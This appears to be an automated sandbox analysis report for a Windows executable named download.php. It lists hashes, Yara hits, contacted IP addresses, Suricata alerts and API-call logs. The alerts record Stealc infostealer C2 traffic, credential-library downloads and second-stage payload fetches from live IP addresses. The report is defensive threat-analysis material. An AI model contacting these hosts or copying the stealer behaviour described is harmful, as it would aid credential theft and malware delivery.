Summary | ZeroBOX

download.php

Emotet Gen1 Amadey Generic Malware Themida UPX Antivirus Malicious Library Malicious Packer Anti_VM PE File PE64 MZP Format OS Processor Check .NET EXE PE32 CAB DLL
Category Machine Started Completed
FILE s1_win7_x6403_us March 8, 2025, 12:08 p.m. March 8, 2025, 12:31 p.m.
Size 5.4MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4677605b34f1e7f4b7c691bd1fddb6a3
SHA256 d532136082788939654457efbf935976af743ef0830e197da6e6dd6ef8ece6b2
CRC32 9F139278
ssdeep 98304:nxZpfpcWlmFfn/wT8k2l4jEOQjABqKHgAyCwNeZn2bNCxtwBEIMjL:nZpfaYTkl4K2ldMNeZn2bNCH+
PDB Path wextract.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
github.com 20.200.245.247
IP Address Status Action
164.124.101.2 Active Moloch
176.113.115.6 Active Moloch
176.113.115.7 Active Moloch
185.125.50.8 Active Moloch
185.215.113.16 Active Moloch
185.215.113.209 Active Moloch
185.215.113.97 Active Moloch
20.200.245.247 Active Moloch
45.93.20.28 Active Moloch
45.33.6.223 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 45.93.20.28:80 -> 192.168.56.103:49168 2400003 ET DROP Spamhaus DROP Listed Traffic Inbound group 4 Misc Attack
TCP 192.168.56.103:49168 -> 45.93.20.28:80 2044243 ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 45.93.20.28:80 2044244 ET MALWARE Win32/Stealc Requesting browsers Config from C2 Malware Command and Control Activity Detected
TCP 45.93.20.28:80 -> 192.168.56.103:49168 2051828 ET MALWARE Win32/Stealc Active C2 Responding with browsers Config M1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 45.93.20.28:80 2044246 ET MALWARE Win32/Stealc Requesting plugins Config from C2 Malware Command and Control Activity Detected
TCP 45.93.20.28:80 -> 192.168.56.103:49168 2051831 ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 176.113.115.7:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 45.93.20.28:80 2044248 ET MALWARE Win32/Stealc Submitting System Information to C2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 45.93.20.28:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 45.93.20.28:80 2044301 ET HUNTING HTTP GET Request for sqlite3.dll - Possible Infostealer Activity A suspicious filename was detected
TCP 176.113.115.7:80 -> 192.168.56.103:49170 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49170 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49170 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 45.93.20.28:80 -> 192.168.56.103:49168 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.93.20.28:80 -> 192.168.56.103:49168 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80 2044303 ET HUNTING HTTP GET Request for freebl3.dll - Possible Infostealer Activity A suspicious filename was detected
TCP 45.93.20.28:80 -> 192.168.56.103:49171 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.93.20.28:80 -> 192.168.56.103:49171 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80 2044302 ET HUNTING HTTP GET Request for mozglue.dll - Possible Infostealer Activity A suspicious filename was detected
TCP 192.168.56.103:49177 -> 176.113.115.7:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 45.93.20.28:80 -> 192.168.56.103:49171 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49177 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49177 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80 2044305 ET HUNTING HTTP GET Request for nss3.dll - Possible Infostealer Activity A suspicious filename was detected
TCP 192.168.56.103:49179 -> 176.113.115.7:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49179 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49179 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 185.125.50.8:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 185.125.50.8:80 -> 192.168.56.103:49175 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.125.50.8:80 -> 192.168.56.103:49175 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80 2044306 ET HUNTING HTTP GET Request for softokn3.dll - Possible Infostealer Activity A suspicious filename was detected
TCP 192.168.56.103:49171 -> 45.93.20.28:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80 2044307 ET HUNTING HTTP GET Request for vcruntime140.dll - Possible Infostealer Activity A suspicious filename was detected
TCP 192.168.56.103:49186 -> 176.113.115.7:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49186 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49186 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49186 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 185.125.50.8:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49193 -> 176.113.115.7:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49193 2014819 ET INFO Packed Executable Download Misc activity
TCP 176.113.115.7:80 -> 192.168.56.103:49193 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49193 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49193 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 176.113.115.7:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49208 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49208 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49208 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49211 -> 176.113.115.7:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 176.113.115.7:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49211 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49211 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49211 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 176.113.115.7:80 2032162 ET INFO PS1 Powershell File Request Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.103:49215 2400030 ET DROP Spamhaus DROP Listed Traffic Inbound group 31 Misc Attack
TCP 192.168.56.103:49215 -> 185.215.113.16:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.103:49215 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.16:80 -> 192.168.56.103:49215 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.103:49215 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49211 -> 176.113.115.7:80 2032162 ET INFO PS1 Powershell File Request Potentially Bad Traffic
TCP 185.215.113.209:80 -> 192.168.56.103:49219 2400030 ET DROP Spamhaus DROP Listed Traffic Inbound group 31 Misc Attack
TCP 192.168.56.103:49217 -> 176.113.115.7:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49217 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49217 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49217 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49221 -> 20.200.245.247:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
ICMP 185.215.113.97:None -> 192.168.56.103:None 2400030 ET DROP Spamhaus DROP Listed Traffic Inbound group 31 Misc Attack
TCP 192.168.56.103:49226 -> 20.200.245.247:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49227 -> 20.200.245.247:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49233 -> 176.113.115.7:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49233 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49233 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49233 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 20.200.245.247:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49225 -> 176.113.115.7:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49225 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49225 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49233 -> 176.113.115.7:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49225 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49233 2014819 ET INFO Packed Executable Download Misc activity
TCP 176.113.115.7:80 -> 192.168.56.103:49233 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49233 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 20.200.245.247:443 -> 192.168.56.103:49228 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 20.200.245.247:443 -> 192.168.56.103:49223 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Set
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Marriott=x
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: RsModerators
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: (Eau(Encounter(
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'RsModerators' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: XaObserver
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: (Downtown(Bbw(Statistics(
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'XaObserver' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ImViOc
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: (Gives(Ml(Logan(Phrase(Arch(Michael(Census(Teens(
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'ImViOc' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: aujPrivacy
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: (Diabetes(Remind(Minister(
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'aujPrivacy' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: xxQNCoins
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: (Shield(
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'xxQNCoins' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Set
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Attachment=X
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: CsgkTranslations
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: (Broke(Courses(Leone(Acid(Cv(
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'CsgkTranslations' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: HsPete
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: (Cruises(Opponents(Inform(
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'HsPete' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ZtPrecise
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: (Tvcom(
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'ZtPrecise' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: sGVDialogue
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: (Contributions(Anime(Accounts(
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'sGVDialogue' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: gIHilton
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: (Criticism(Traditional(Become(Magnet(
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'gIHilton' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: HhIBGrowth
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: (Match(Cycling(Problem(Efficiency(
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'HhIBGrowth' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000224990
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b501070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b501070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b501070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5010e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5010e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5013f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5013f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5013f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5013f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b501460
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b501460
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b501460
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000224ca0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000224ca0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000224ca0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5011c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5011c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5011c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5011c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5011c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5011c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5011c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5011c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5014d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5014d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5014d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b501b60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b501b60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002068d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002068d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000206a90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000206a90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000206a90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b501c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b501c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b501cb0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b501cb0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b528f00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b528f00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b529280
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b529280
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002247d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002247d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002247d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002247d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0082d198
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0082d198
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0082d258
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

